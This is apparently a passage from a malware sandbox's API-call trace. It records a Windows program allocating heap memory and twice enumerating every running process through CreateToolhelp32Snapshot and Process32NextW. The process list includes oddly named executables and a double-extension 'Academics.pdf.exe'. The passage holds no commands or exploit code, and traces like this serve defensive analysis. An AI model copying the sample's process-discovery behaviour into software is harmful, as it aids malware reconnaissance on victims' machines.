(HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0307.289] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0307.289] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0307.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.289] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0307.291] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0307.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0307.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0307.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0307.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0307.306] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0307.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.307] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0307.308] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0307.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0307.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0307.310] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0307.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0307.311] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0307.314] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0307.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0307.315] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0307.316] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0307.317] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0307.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0307.318] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0307.319] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0307.320] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0307.330] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0307.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0307.331] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.332] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0307.333] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0307.334] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0307.335] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0307.336] CloseHandle (hObject=0x294) returned 1 [0307.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0307.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0307.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0307.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0307.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0307.336] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0307.336] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0307.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0307.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0307.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0307.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0307.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0307.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0307.336] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0307.338] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0307.339] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0307.340] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0307.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.341] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0307.342] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0307.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0307.343] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0307.344] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0307.345] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0307.346] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.346] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.347] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.348] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.349] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0307.350] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.351] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.352] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0307.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0307.353] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0307.354] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0307.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0307.355] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0307.356] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0307.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0307.357] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, 